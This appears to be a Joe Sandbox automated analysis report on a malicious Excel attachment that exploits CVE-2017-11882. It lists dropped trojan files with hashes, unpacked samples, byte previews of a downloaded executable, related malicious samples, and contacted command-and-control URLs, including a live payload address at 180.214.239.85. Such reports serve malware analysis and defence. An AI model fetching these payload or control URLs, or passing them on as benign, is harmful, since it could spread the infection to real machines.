            SourceDetectionScannerLabelLink
            (QUOTATION)B-RUS-20061REV2.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe13%ReversingLabsWin32.Trojan.Pwsx
            C:\Users\Public\vbc.exe13%ReversingLabsWin32.Trojan.Pwsx

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            8.0.msiexec.exe.a30000.0.unpack100%AviraHEUR/AGEN.1104764Download File
            5.2.vbc.exe.7cd780.2.unpack100%AviraHEUR/AGEN.1104764Download File
            5.2.vbc.exe.330000.0.unpack100%AviraHEUR/AGEN.1104764Download File
            5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            8.2.msiexec.exe.a30000.0.unpack100%AviraHEUR/AGEN.1104764Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://java.sun.com0%Avira URL Cloudsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
            http://180.214.239.85/service/rundll32.exe100%Avira URL Cloudmalware
            www.odysseysailingsantorini.com/cmsr/0%Avira URL Cloudsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://computername/printers/printername/.printer0%Avira URL Cloudsafe
            http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://treyresearch.net0%URL Reputationsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe
            http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.paradisgrp.com
            128.65.195.232
            truetrue
              unknown
              uvoyus.com
              34.102.136.180
              truefalse
                unknown
                www.uvoyus.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://180.214.239.85/service/rundll32.exetrue
                  • Avira URL Cloud: malware
                  unknown
                  www.odysseysailingsantorini.com/cmsr/true
                  • Avira URL Cloud: safe
                  low
                  http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==true
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpfalse
                    high
                    http://www.windows.com/pctv.explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                      high
                      http://java.sun.comexplorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://investor.msn.comexplorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                        high
                        http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpfalse
                            high
                            http://investor.msn.com/explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                              high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpfalse
                                high
                                http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.%s.comPAexplorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                low
                                http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpfalse
                                  high
                                  https://support.mozilla.orgexplorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpfalse
                                    high
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                                      high
                                      http://treyresearch.netexplorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      34.102.136.180
                                      uvoyus.comUnited States
                                      15169GOOGLEUSfalse
                                      128.65.195.232
                                      www.paradisgrp.comSwitzerland
                                      29222INFOMANIAK-ASCHtrue
                                      180.214.239.85
                                      unknownViet Nam
                                      135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491355
                                      Start date:27.09.2021
                                      Start time:14:03:03
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 12m 43s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:(QUOTATION)B-RUS-20061REV2.xlsx
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLSX@10/10@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 10.1% (good quality ratio 9.6%)
                                      • Quality average: 72.4%
                                      • Quality standard deviation: 26.5%
                                      HCA Information:
                                      • Successful, ratio: 94%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .xlsx
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491355/sample/(QUOTATION)B-RUS-20061REV2.xlsx

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      14:03:35API Interceptor118x Sleep call for process: EQNEDT32.EXE modified
                                      14:03:41API Interceptor77x Sleep call for process: vbc.exe modified
                                      14:04:06API Interceptor198x Sleep call for process: msiexec.exe modified
                                      14:04:55API Interceptor1x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      128.65.195.232Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                      • www.paradisgrp.com/cmsr/?qfVdsr=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==&zZ4pz=9rbHiH1hJ
                                      gB8j5x4VHp.exeGet hashmaliciousBrowse
                                      • www.paradisgrp.com/cmsr/?2dg=6l-DZlrx1r&nRjTuH=ujlsVlr2pvax8YP7nc18bZaAxLX0DfE0xdJb95/2nuxvPpcfhrDfh7BHvYCIXMBs3lLU
                                      180.214.239.85MV HULDA MAERSK.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85/service/rundll32.exe
                                      TB-000-YT-PR-951.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85/registry/rundll32.exe

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      www.paradisgrp.comRenewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                      • 128.65.195.232
                                      gB8j5x4VHp.exeGet hashmaliciousBrowse
                                      • 128.65.195.232

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      INFOMANIAK-ASCHE2ecGhjXtGGet hashmaliciousBrowse
                                      • 185.176.226.19
                                      Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                      • 128.65.195.232
                                      zMPWVyU5xF.exeGet hashmaliciousBrowse
                                      • 84.16.79.73
                                      whBvzy3Lkt.exeGet hashmaliciousBrowse
                                      • 84.16.79.73
                                      phantom.x86Get hashmaliciousBrowse
                                      • 93.88.249.1
                                      gB8j5x4VHp.exeGet hashmaliciousBrowse
                                      • 128.65.195.232
                                      am2zWv3TtG.exeGet hashmaliciousBrowse
                                      • 128.65.195.88
                                      fsd8ks3VNb.exeGet hashmaliciousBrowse
                                      • 128.65.195.32
                                      2UUlKfJYJN.exeGet hashmaliciousBrowse
                                      • 83.166.138.81
                                      u3O3kHV2IT.exeGet hashmaliciousBrowse
                                      • 83.166.138.66
                                      tS9P6wPz9x.exeGet hashmaliciousBrowse
                                      • 83.166.155.153
                                      ransomware.exeGet hashmaliciousBrowse
                                      • 83.166.155.153
                                      ransomware.exeGet hashmaliciousBrowse
                                      • 83.166.155.153
                                      ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                      • 128.65.195.152
                                      GkrIJKmWHp.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      RrZ6BOnPCG.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      MV QU SHAN HAI.xlsxGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      PDRgIfT71e.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      Spisemuligheds4.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      http://quip.com/uPSzAnYlObJf/eFax-Get hashmaliciousBrowse
                                      • 83.166.136.204
                                      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsxGet hashmaliciousBrowse
                                      • 103.133.106.165
                                      MV HULDA MAERSK.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      sora.x86Get hashmaliciousBrowse
                                      • 14.225.54.61
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      qMRlFBUgJO.exeGet hashmaliciousBrowse
                                      • 103.151.125.18
                                      qMRlFBUgJO.exeGet hashmaliciousBrowse
                                      • 103.151.125.18
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      RFQ Beijing Chengruisi Manufacturing.xlsxGet hashmaliciousBrowse
                                      • 103.133.106.199
                                      TB-000-YT-PR-951.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85
                                      6EPlWd2sWk.exeGet hashmaliciousBrowse
                                      • 103.133.111.221
                                      qzxyEJNuK1.exeGet hashmaliciousBrowse
                                      • 103.151.123.50
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      1 Balance_PI Dt. 21.9.2021.xlsxGet hashmaliciousBrowse
                                      • 103.133.108.160
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      Zam#U00f3wienie zakupu # 49211.exeGet hashmaliciousBrowse
                                      • 103.141.138.110
                                      I Ordine di acquisto 49211.ppamGet hashmaliciousBrowse
                                      • 103.141.138.110
                                      Compensateur en A37C1_Rev 01.xlsxGet hashmaliciousBrowse
                                      • 103.133.108.160
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      Hua Joo Success Industry.xlsxGet hashmaliciousBrowse
                                      • 103.133.106.199

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\Public\vbc.exeMV HULDA MAERSK.xlsxGet hashmaliciousBrowse
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeMV HULDA MAERSK.xlsxGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:downloaded
                                          Size (bytes):685568
                                          Entropy (8bit):7.6030295284828995
                                          Encrypted:false
                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                          MD5:50568FB6133EE4ED721EE46A3C0A9E98
                                          SHA1:4897B6F2141395071652F72D34DC3D39EB014A56
                                          SHA-256:2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
                                          SHA-512:D5FACFCF30E3E9F815F595C3AF6992551D623A5592C13E7AE8DF4E29E7F6401523339BF5A7835D46C80B998FDC3338530EA677F85A08C4FE16829A83879F529F
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Joe Sandbox View:
                                          • Filename: MV HULDA MAERSK.xlsx, Detection: malicious, Browse
                                          Reputation:low
                                          IE Cache URL:http://180.214.239.85/service/rundll32.exe
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qa..............0..j.............. ........@.. ....................................@.....................................O.......`............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...`............l..............@..@.reloc...............t..............@..B.......................H........C...............6...Q.........................................."..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..q........(........(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.....*j...(......
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45827960.png
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):65050
                                          Entropy (8bit):7.959940260382877
                                          Encrypted:false
                                          SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                                          MD5:22335141D285E599CDAEF99EABA59D5B
                                          SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                                          SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                                          SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                                          Malicious:false
                                          Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5C69E1.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
                                          Category:dropped
                                          Size (bytes):104859
                                          Entropy (8bit):7.948547334191616
                                          Encrypted:false
                                          SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
                                          MD5:50B23CFD2E093C27B7624BB70EF7A825
                                          SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
                                          SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
                                          SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
                                          Malicious:false
                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.*....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.*8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90D5CCBD.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                          Category:dropped
                                          Size (bytes):8815
                                          Entropy (8bit):7.944898651451431
                                          Encrypted:false
                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                          MD5:F06432656347B7042C803FE58F4043E1
                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                          Malicious:false
                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F672CAC.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
                                          Category:dropped
                                          Size (bytes):104859
                                          Entropy (8bit):7.948547334191616
                                          Encrypted:false
                                          SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
                                          MD5:50B23CFD2E093C27B7624BB70EF7A825
                                          SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
                                          SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
                                          SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
                                          Malicious:false
                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.*....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.*8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emf
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):648132
                                          Entropy (8bit):2.812377979512145
                                          Encrypted:false
                                          SSDEEP:3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
                                          MD5:816D69A133BA4D7103958A560A4FD1A7
                                          SHA1:C242B70AAA47AA1844412103F8CAEA1077AB476F
                                          SHA-256:6E888B831004EE7215F9E411B88AA2F59806B9E59CBDC03AD00646EC5F9258AB
                                          SHA-512:E2ED68FF05CDB585BA5688C6BFE0419D38E1550BFB8FBA914E0A053E94F189F9364BF308B9935897ECEF25A11C52C85B8484D15767B0FE476DD3395FFE86D095
                                          Malicious:false
                                          Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................\$.....X..f.\.@..%.....X...X.....t.X...X.RQ.]t.X.l.X.......X.X.X.$Q.]t.X.l.X. ...Id.\l.X.t.X. ............d.\........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............X.X...l.X...X..8.\........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1602797.png
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):65050
                                          Entropy (8bit):7.959940260382877
                                          Encrypted:false
                                          SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                                          MD5:22335141D285E599CDAEF99EABA59D5B
                                          SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                                          SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                                          SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                                          Malicious:false
                                          Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3DA066E.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                          Category:dropped
                                          Size (bytes):8815
                                          Entropy (8bit):7.944898651451431
                                          Encrypted:false
                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                          MD5:F06432656347B7042C803FE58F4043E1
                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                          Malicious:false
